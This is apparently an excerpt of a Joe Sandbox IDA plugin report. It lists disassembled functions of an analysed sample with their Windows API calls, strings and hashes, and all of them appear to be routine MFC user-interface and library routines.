Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$Ctrl
String ID: %sBasePane-%d$%sBasePane-%d%x$IsVisible
API String ID: 3879667756-4027084908
Opcode ID: 54fd1fcac68b3f405cac0405f2ca3a025a3dd165a9f42df2081dc8825a352f12
Instruction ID: 7fbd46752e30b59d09269b9042fb1629cf474e2c60c7c7d75f709ee32bc340b0
Opcode Fuzzy Hash: 54fd1fcac68b3f405cac0405f2ca3a025a3dd165a9f42df2081dc8825a352f12
Instruction Fuzzy Hash: 8431907190021AAFCF04EFB4C89A9BE7FA5BF15325B04455EF4269B2D2DA349A009791

Function 00544B04 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,00000018,?), ref: 00544B2F
IntersectRect.USER32(00000000,?,00000000), ref: 00544B97

Strings

NRT, xrefs: 00544BC8
TR`, xrefs: 00544BDC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: IntersectObjectRect
String ID: NRT$TR`
API String ID: 3895296623-2220355878
Opcode ID: 308cb3fcdbeec5ec5c9f9d72aec8bfd93249ee4acf744128747256068ca35a86
Instruction ID: 0b47e161435e08c6f8ec925f22dd7ee6960b44177e3a1d58ab1e66f400ef7b13
Opcode Fuzzy Hash: 308cb3fcdbeec5ec5c9f9d72aec8bfd93249ee4acf744128747256068ca35a86
Instruction Fuzzy Hash: BB314D71900218AFCF14CFA9D845BEEBBF9FF88314F14415AE505E6280DB749A45CF60

Function 0053433F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00534346

Strings

P`, xrefs: 00534391
8`, xrefs: 005343AD
Afx:Slider, xrefs: 005343FF

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3
String ID: 8`$Afx:Slider$P`
API String ID: 431132790-3234085688
Opcode ID: fc842c9a0d716f201c92a8c2dead8a46ac390d0a35e3ed70a28b369485f4e26a
Instruction ID: 6cfe435a2d1b202b6b79a7503d2bfce59f59d60026e05012cef97b76b1f13011
Opcode Fuzzy Hash: fc842c9a0d716f201c92a8c2dead8a46ac390d0a35e3ed70a28b369485f4e26a
Instruction Fuzzy Hash: 73319C70200206AFCF19DF65C852BAA7BA2FF44314F14881EF81A9B391CB35E891CF94

Function 0052040B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 0055C168: __EH_prolog3.LIBCMT ref: 0055C16F
Part of subcall function 0055C168: EnterCriticalSection.KERNEL32(00646EB4,00000000,004FC29A,00000001), ref: 0055C1CB
Part of subcall function 0055C168: __beginthread.LIBCMT ref: 0055C1E5
Part of subcall function 0055C168: SetThreadPriority.KERNEL32(00000000,000000FF), ref: 0055C1FE
Part of subcall function 0055C168: LeaveCriticalSection.KERNEL32(00646EB4), ref: 0055C215

Part of subcall function 004ECD55: ShowWindow.USER32(00000000,?,?,004DC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 004ECD66

IsWindow.USER32(?), ref: 005204DB
InvalidateRect.USER32(?,00000054,00000001,?,00000000,00000000,00520742), ref: 005204F1
UpdateWindow.USER32(?), ref: 005204FD

Strings

<L`, xrefs: 00520418

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$CriticalSection$EnterH_prolog3InvalidateLeavePriorityRectShowThreadUpdate__beginthread
String ID: <L`
API String ID: 701223984-3276711095
Opcode ID: 325f51c129588242e04ca0838999a3c3acd2eddf17e6533c719411fd5122d3ae
Instruction ID: 25cf89614290bd1410a8a64c9b2cbb5e5961c1e62384c711337f66825f524088
Opcode Fuzzy Hash: 325f51c129588242e04ca0838999a3c3acd2eddf17e6533c719411fd5122d3ae
Instruction Fuzzy Hash: 1421E1313016109FCB21AB65D895EBEBBE6FF88B01F14406EF149872E2DB769801CB84

Function 0055079D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,Function_0007F66F), ref: 005507C6
KillTimer.USER32(?,?), ref: 005507E2
InvalidateRect.USER32(?,?,00000001), ref: 00550869

Strings

(`, xrefs: 005507EF

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Timer$InvalidateKillRect
String ID: (`
API String ID: 2676148147-4108213102
Opcode ID: 07cef56ccc392e847da41eff2b0e0794da2909d681a918a99ec4560bd895db8d
Instruction ID: 9484b5cb7e2c8b15447c01b34bc83a27d1a890f87f40deeb3753dccf7a730a9f
Opcode Fuzzy Hash: 07cef56ccc392e847da41eff2b0e0794da2909d681a918a99ec4560bd895db8d
Instruction Fuzzy Hash: 0A21A731600B10EFD7229B15DC91C69BFE2FB89711725552FF945826B1D772E844CF40

Function 0052EC35 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0052EC3C

Part of subcall function 0055EBDB: __EH_prolog3.LIBCMT ref: 0055EBE2

Part of subcall function 004ECCD1: GetDlgCtrlID.USER32(?), ref: 004ECCDA

Strings

%sBasePane-%d%x, xrefs: 0052ECA4
%sBasePane-%d, xrefs: 0052EC8D
IsVisible, xrefs: 0052ECE3

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$Ctrl
String ID: %sBasePane-%d$%sBasePane-%d%x$IsVisible
API String ID: 3879667756-4027084908
Opcode ID: 801845ccc1bfe42cfc0ef6de9e161af3df10a64cb5b90875f5caf7497b79ed0b
Instruction ID: 1ab2f255d209f374ac8e2148378b916245e13d55458ef9eed33e5187c72a33cd
Opcode Fuzzy Hash: 801845ccc1bfe42cfc0ef6de9e161af3df10a64cb5b90875f5caf7497b79ed0b
Instruction Fuzzy Hash: 6321C371900215AFCF14AFA4C89A9BE7F66BF45324F04421EF826A73D1CA349E40D7A1

Function 0054B240 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0054B247

Part of subcall function 0052EA58: __EH_prolog3.LIBCMT ref: 0052EA5F
Part of subcall function 0052EA58: SetRectEmpty.USER32(?), ref: 0052EAF5

Part of subcall function 00585176: SetRectEmpty.USER32(?), ref: 005851A8
Part of subcall function 00585176: SetRectEmpty.USER32(?), ref: 005851AF

SetRectEmpty.USER32(?), ref: 0054B32D
SetRectEmpty.USER32(?), ref: 0054B356

Strings

`c, xrefs: 0054B34C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect$H_prolog3
String ID: `c
API String ID: 3752103406-2598275076
Opcode ID: 2fcb43ab5756f0297d4e39f49e83c61bcd7dfc4a3c4e751dca6b6b163c86c6c7
Instruction ID: 0ab1ca4c2a1eee8c21b2a230b5babf39b06427a6a57f481a8d18b42ce3f5e07f
Opcode Fuzzy Hash: 2fcb43ab5756f0297d4e39f49e83c61bcd7dfc4a3c4e751dca6b6b163c86c6c7
Instruction Fuzzy Hash: D34143B0805B81CFC3659F7A89896D6FBE0BB59300F90892ED1AE8B341DB756144CF84

Function 004DCE2F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 004DCE54
GetSysColor.USER32(00000014), ref: 004DCE9E
CreateDIBitmap.GDI32(?,00000028,00000004,?,00000028,00000000), ref: 004DCEF1

Strings

(, xrefs: 004DCE82

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: BitmapColorCreate_memset
String ID: (
API String ID: 3930187609-3887548279
Opcode ID: a07d9c1164a46bc8c65eba646e3117d789822934d66a8c7e472619add287ae59
Instruction ID: 4b262e8b33e16a52c34e093c45ad7ac42cdbf2cbb62f6d662f18e048f615da65
Opcode Fuzzy Hash: a07d9c1164a46bc8c65eba646e3117d789822934d66a8c7e472619add287ae59
Instruction Fuzzy Hash: 7E21F571A11258DFDB04CBB8CC55BEDBBF4AF95700F00446EE646E7281DA355A48CB61

Function 004EF457 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(DWMAPI,?,?,00000000,?,?,?,?,?,?,?,?,00525927), ref: 004EF4CE
GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 004EF4DE

Strings

DwmInvalidateIconicBitmaps, xrefs: 004EF4D8
DWMAPI, xrefs: 004EF4C9

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: DWMAPI$DwmInvalidateIconicBitmaps
API String ID: 1646373207-1098356003
Opcode ID: c28c146f8820bb300dce3387ce85c07953de93d4586aa560507ee292b45a7bd1
Instruction ID: b456abee8952fa3148736c030bdd4c1063671448cf6af93cf76e72dc580a704b
Opcode Fuzzy Hash: c28c146f8820bb300dce3387ce85c07953de93d4586aa560507ee292b45a7bd1
Instruction Fuzzy Hash: 45118172B002459BCB00EF7ADC84ABB77E5EF59301B141479A906EB281EE79DD08CB64

Function 0053AB47 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0053AB4E

Part of subcall function 0054B240: __EH_prolog3.LIBCMT ref: 0054B247
Part of subcall function 0054B240: SetRectEmpty.USER32(?), ref: 0054B32D
Part of subcall function 0054B240: SetRectEmpty.USER32(?), ref: 0054B356

SetRectEmpty.USER32(?), ref: 0053AC55
SetRectEmpty.USER32(?), ref: 0053AC5E

Strings

(;`, xrefs: 0053ABB4

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect$H_prolog3
String ID: (;`
API String ID: 3752103406-3089055786
Opcode ID: 8d1e0248bf706e53ce7219e87ebfbd6963a6f8c180b0780a088726a5e5cddb22
Instruction ID: abee29a21e7b04c46d21ff8d4c9811820f260bf3294096f48ec1ce9225e9f56a
Opcode Fuzzy Hash: 8d1e0248bf706e53ce7219e87ebfbd6963a6f8c180b0780a088726a5e5cddb22
Instruction Fuzzy Hash: DA3129B0942B068FC3669F6AC5C868AFBE8BF48300F90892ED0AE97211C7707644CF45

Function 0053B3E7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0053B409
GetParent.USER32(?), ref: 0053B412

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Strings

c, xrefs: 0053B448
`c, xrefs: 0053B420

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CursorException@8H_prolog3ParentThrow
String ID: `c$c
API String ID: 494443650-2814568683
Opcode ID: 7145578484253d38a267b8194fe5ab6269c666c9945eb40cea9b237d998674ad
Instruction ID: c38db6c1eca0ed5d6b31854686b2c06c4a46011b13e5596741fbdace9f4135ac
Opcode Fuzzy Hash: 7145578484253d38a267b8194fe5ab6269c666c9945eb40cea9b237d998674ad
Instruction Fuzzy Hash: 0611AC32600204BFDF006FA68C49DAE7BAEFF89315B10407EB605C6251EB359D008BA4

Function 00502DF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 00502E15
InflateRect.USER32(?,000000FF,000000FF), ref: 00502E4C
DrawEdge.USER32(?,?,00000000,0000000F), ref: 00502E6C

Strings

iii, xrefs: 00502E32

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$DrawEdgeFillInflate
String ID: iii
API String ID: 785442924-940974255
Opcode ID: 55b6310d77028ebd1e2f4b52cd51d505d88f2a22541bc5785f0518e5425f11f3
Instruction ID: 74ccb60563ee413bf34e9dbeea1971cc55001ef6759e45db21b1e01316fd5a42
Opcode Fuzzy Hash: 55b6310d77028ebd1e2f4b52cd51d505d88f2a22541bc5785f0518e5425f11f3
Instruction Fuzzy Hash: D711DA75500209AFCF00DFA4DD859EF7BB9FB49324B104626B915EB191DB34AA09DB60

Function 00513324 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6230
Part of subcall function 004E61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6242
Part of subcall function 004E61F6: LeaveCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E624F
Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E625F

CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0051358B), ref: 0051336D
CreatePatternBrush.GDI32(00000000), ref: 0051337A
DeleteObject.GDI32(00000000), ref: 00513386

Strings

h fd, xrefs: 00513396

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$CreateEnter$BitmapBrushDeleteInitializeLeaveObjectPattern
String ID: h fd
API String ID: 3767330792-2665688944
Opcode ID: 7fcf9ca4949d41533792870acbe5601f21464889a57ae17807b4dde0f007125b
Instruction ID: 900944cd01e025692f451a6d219bb1b793c8e2da91063e0ac3f8b6f459ca55ba
Opcode Fuzzy Hash: 7fcf9ca4949d41533792870acbe5601f21464889a57ae17807b4dde0f007125b
Instruction Fuzzy Hash: E401FE305403046BEB00BB78DD16BED3ED5FB5A711F01056DF501D71D1CE644989C766

Function 004EACB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6230
Part of subcall function 004E61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6242
Part of subcall function 004E61F6: LeaveCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E624F
Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E625F

Part of subcall function 004E1231: __EH_prolog3_catch.LIBCMT ref: 004E1238

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 004EACF9
FreeLibrary.KERNEL32(?), ref: 004EAD09

Strings

hhctrl.ocx, xrefs: 004EACDD
HtmlHelpW, xrefs: 004EACF3

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpW$hhctrl.ocx
API String ID: 2853499158-3773518134
Opcode ID: 84ab751c8565b1fbc7f7e09b26182fc3a54366dad3d9e36fa9e18a80a467dc3e
Instruction ID: 0fde52b6bade81f746e05d3b0000b33bea9be03a1e87c5de0ad102d06e9f2603
Opcode Fuzzy Hash: 84ab751c8565b1fbc7f7e09b26182fc3a54366dad3d9e36fa9e18a80a467dc3e
Instruction Fuzzy Hash: 7F01D631140747ABDB212F63CC09F2B7A95EF107A7F10881BF91A91561DB7CE460E65B

Function 004E0F09 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 004E0F2A
GetClassNameW.USER32(?,?,0000000A), ref: 004E0F3F
CompareStringW.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 004E0F59

Strings

combobox, xrefs: 004E0F47

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

